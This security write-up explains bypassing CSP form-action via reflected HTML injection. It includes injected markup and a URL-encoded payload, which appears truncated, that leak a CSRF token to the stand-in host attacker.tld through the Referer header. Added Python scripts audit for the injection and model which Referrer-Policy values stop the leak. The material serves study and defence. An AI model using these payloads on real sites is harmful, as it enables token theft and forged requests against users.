Bypassing CSP form-action with reflected XSS
CSP (Content-Security-Policy) is an HTTP response header made up of directives that tell the browser how to restrict the content of a page. The form-action directive, for example, restricts the URLs to which forms on the page may be submitted. This protection can be bypassed through an XSS / HTML injection vulnerability.

The form-action directive

To understand why the form-action directive is important from a security perspective, imagine this scenario:

Content-Security-Policy: default-src 'none';

<html><body><div>[Reflected XSS vulnerability here]</div><form method="POST" id="subscribe" action="/api/v1/newsletter/subscribe"><input type="hidden" name="csrftoken" value="5f4dcc3b5aa765d61d8327deb882cf99" /><input type="submit" value="Subscribe to newsletter" /></form></body></html>

Since the CSP doesn't allow scripts, we can't use scripts to extract the csrf token. However, by injecting a <form> tag we can override where the form (including the csrf token) will be submitted:

Content-Security-Policy: default-src 'none';

<html><body><div><form action="http://attacker.tld"></div><form method="POST" id="subscribe" action="/api/v1/newsletter/subscribe"><input type="hidden" name="csrftoken" value="5f4dcc3b5aa765d61d8327deb882cf99" /><input type="submit" value="Subscribe to newsletter" /></form></body></html>

This is what the form-action directive prevents: with it restricted to the site's own origin (for example form-action 'self'), the injected form cannot submit to attacker.tld.

Bypass in Chrome

The directive can be bypassed by overriding the method of an existing form (using the formmethod attribute) to GET and its action (using the formaction attribute) to "" (the current page). We then combine this with a referrer-leaking element such as <link rel='subresource' href='http://attacker.tld/link-subresource'>. When the victim clicks our injected submit button, the browser sends the form values to the current page as GET parameters. These GET parameters are then leaked to attacker.tld because of the referrer-leaking element. In other words, the form values (including the CSRF token) are sent to http://attacker.tld through the Referer header. form-action bypassed!

Demo:

22%20formaction=%22%22%20form=%22subscribe%22%20formmethod=%22get%22%20/%3E%3Cinput%20type=%22hidden%22%20name=%22xss%22%20form=%22subscribe%22%20value=%22%3Clink%20rel=%27subresource%27%20href=%27http://attacker.tld/link-subresource%27%3E%22/%3E

Aftermath:

Content-Security-Policy: default-src 'none';

<html><body><div><input value="CLICK ME FOR POC" type="submit" formaction="" form="subscribe" formmethod="get" /><input type="hidden" name="xss" form="subscribe" value="<link rel='subresource' href='http://attacker.tld/link-subresource'>"/></div><form method="POST" id="subscribe" action="/api/v1/newsletter/subscribe"><input type="hidden" name="csrftoken" value="5f4dcc3b5aa765d61d8327deb882cf99" /><input type="submit" value="Subscribe to newsletter" /></form></body></html>

Bypassing in Firefox

The attack for Firefox is essentially the same, but instead of <link rel='subresource' href='http://attacker.tld'> we use <a href='http://attacker.tld'>, the downside being that the user has to click twice instead of once.
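The attribute overrides the bypass relies on (form=, formaction, formmethod) and the cross-origin element that carries the Referer can both be spotted in a response body. The following Python script is an added example, not part of the original post; it uses only the standard library and runs over two constructed responses built from the scenario above: the page after the injection (stage 1) and the same page after the GET submission has reflected the xss parameter (stage 2). The origin http://victim.example is hypothetical; the form id, field names and the attacker host are the ones the write-up uses.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed samples. The page origin is hypothetical; ids, field names and the
# attacker host follow the write-up.
PAGE_ORIGIN = "http://victim.example"

# Stage 1: the response after the injected submit button and hidden field.
STAGE1_HTML = """<html><body><div>
<input value="CLICK ME FOR POC" type="submit" formaction="" form="subscribe" formmethod="get" />
<input type="hidden" name="xss" form="subscribe"
       value="<link rel='subresource' href='http://attacker.tld/link-subresource'>"/>
</div><form method="POST" id="subscribe" action="/api/v1/newsletter/subscribe">
<input type="hidden" name="csrftoken" value="5f4dcc3b5aa765d61d8327deb882cf99" />
<input type="submit" value="Subscribe to newsletter" /></form></body></html>"""

# Stage 2: the same page after the GET submission reflected the xss parameter.
STAGE2_HTML = """<html><body><div>
<link rel='subresource' href='http://attacker.tld/link-subresource'>
</div><form method="POST" id="subscribe" action="/api/v1/newsletter/subscribe">
<input type="hidden" name="csrftoken" value="5f4dcc3b5aa765d61d8327deb882cf99" />
<input type="submit" value="Subscribe to newsletter" /></form></body></html>"""


class FormAuditor(HTMLParser):
    """Records <form> declarations, form-associated controls, and elements whose
    fetch or navigation to an absolute URL would carry the page URL as Referer."""

    def __init__(self):
        super().__init__()
        self.forms = {}      # form id -> {"method": ..., "action": ...}
        self.controls = []   # every <input>/<button> with the form it belongs to
        self.refs = []       # (tag, absolute URL) of referrer-carrying elements
        self._open_form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open_form = a.get("id")
            self.forms[self._open_form] = {"method": a.get("method", "get").lower(),
                                           "action": a.get("action", "")}
        elif tag in ("input", "button"):
            # form= re-associates a control with any form by id, even when the
            # control sits outside that form in the markup
            self.controls.append({"owner": a.get("form", self._open_form), **a})
        elif tag in ("link", "a", "img", "iframe"):
            url = a.get("href") or a.get("src")
            if url and urlsplit(url).scheme in ("http", "https"):
                self.refs.append((tag, url))

    def handle_endtag(self, tag):
        if tag == "form":
            self._open_form = None


def origin_of(url):
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}"


def audit(html, page_origin):
    """Return submit controls that change a form's method/action, and the
    cross-origin references that would leak the current URL via Referer."""
    p = FormAuditor()
    p.feed(html)
    hidden = {}
    for c in p.controls:
        if c.get("type", "").lower() == "hidden":
            hidden.setdefault(c["owner"], []).append(c.get("name"))

    overrides = []
    for c in p.controls:
        if c.get("type", "").lower() not in ("submit", "image"):
            continue
        if not ({"formaction", "formmethod", "form"} & c.keys()):
            continue
        form = p.forms.get(c["owner"], {"method": "get", "action": ""})
        eff_method = c.get("formmethod", form["method"]).lower()
        eff_action = c.get("formaction", form["action"])  # "" means the current page URL
        overrides.append({
            "form": c["owner"],
            "declared": (form["method"], form["action"]),
            "effective": (eff_method, eff_action),
            "hidden_fields": hidden.get(c["owner"], []),
            # a GET submission puts every field, CSRF token included, in the query string
            "fields_in_query": eff_method == "get",
        })

    cross_origin = [(t, u) for t, u in p.refs if origin_of(u) != page_origin]
    return {"overrides": overrides, "cross_origin_refs": cross_origin}


if __name__ == "__main__":
    for name, html in (("stage 1", STAGE1_HTML), ("stage 2", STAGE2_HTML)):
        print(name, audit(html, PAGE_ORIGIN))
```

On stage 1 the report shows the subscribe form's declared POST to /api/v1/newsletter/subscribe being rewritten to a GET to the current page, with csrftoken among the hidden fields that will land in the query string; on stage 2 it shows the cross-origin link element that would carry that URL in the Referer header. The markup inside the hidden field's value is not an element until it is reflected, which is why the two stages have to be checked separately. A real scanner would inspect the rendered DOM rather than raw markup, but the association rules (form=, formaction, formmethod) are the same.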
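Whether the token actually leaves the page depends on the Referer value the browser computes for the cross-origin fetch, and that value is governed by the Referrer-Policy header. The following Python example is added here and is not from the original post; it models the eight standard Referrer-Policy values for the page URL produced by the forced GET submission. The host victim.example and the /newsletter path are assumptions; the field names and token value are the write-up's.

```python
from urllib.parse import urlsplit, urlunsplit, urlencode

# Constructed scenario: the page URL after the injected submit button forced a GET
# submission of the "subscribe" form to the current page. The host is hypothetical;
# the field names and token value are the ones used in the write-up.
DOCUMENT_URL = "http://victim.example/newsletter?" + urlencode({
    "csrftoken": "5f4dcc3b5aa765d61d8327deb882cf99",
    "xss": "<link rel='subresource' href='http://attacker.tld/link-subresource'>",
})
LEAK_TARGET = "http://attacker.tld/link-subresource"


def origin_of(url):
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}"


def strip_for_referrer(url):
    """Fetch's 'strip url for use as a referrer': keep scheme, host, port, path and
    query; drop userinfo and fragment. The query string is what carries the token."""
    p = urlsplit(url)
    host = p.hostname or ""
    if p.port:
        host += f":{p.port}"
    return urlunsplit((p.scheme, host, p.path, p.query, ""))


def referer_for(policy, document_url, request_url):
    """Referer header value sent with a request to request_url from a document at
    document_url under the given Referrer-Policy, or None when nothing is sent."""
    doc, req = urlsplit(document_url), urlsplit(request_url)
    same_origin = origin_of(document_url) == origin_of(request_url)
    downgrade = doc.scheme == "https" and req.scheme == "http"
    full = strip_for_referrer(document_url)
    origin_only = origin_of(document_url) + "/"

    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full
    if policy == "origin":
        return origin_only
    if policy == "same-origin":
        return full if same_origin else None
    if policy == "origin-when-cross-origin":
        return full if same_origin else origin_only
    if policy == "strict-origin":
        return None if downgrade else origin_only
    if policy == "strict-origin-when-cross-origin":
        if downgrade:
            return None
        return full if same_origin else origin_only
    raise ValueError(f"unknown Referrer-Policy value: {policy}")


def token_leaks(policy, document_url=DOCUMENT_URL, request_url=LEAK_TARGET):
    """True when the CSRF token in the document's query string reaches request_url."""
    ref = referer_for(policy, document_url, request_url)
    return ref is not None and "csrftoken=" in ref


if __name__ == "__main__":
    for policy in ("no-referrer-when-downgrade", "strict-origin-when-cross-origin",
                   "same-origin", "no-referrer"):
        print(f"{policy:32} leaks token: {token_leaks(policy)!s:5} "
              f"Referer: {referer_for(policy, DOCUMENT_URL, LEAK_TARGET)}")
```

Under no-referrer-when-downgrade, the historic browser default, the full URL including csrftoken reaches attacker.tld over a plain-http page; under strict-origin-when-cross-origin, the default in current Chromium and Firefox, only http://victim.example/ is sent. An explicit Referrer-Policy: no-referrer or same-origin response header removes the leak regardless of browser defaults. This closes only the referrer channel: the injected submit button still redirects the form, so fixing the injection point and keeping form-action in the policy remain necessary.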
Source: SecYe Security [http://www.secye.com] (Editor: SecYe Security)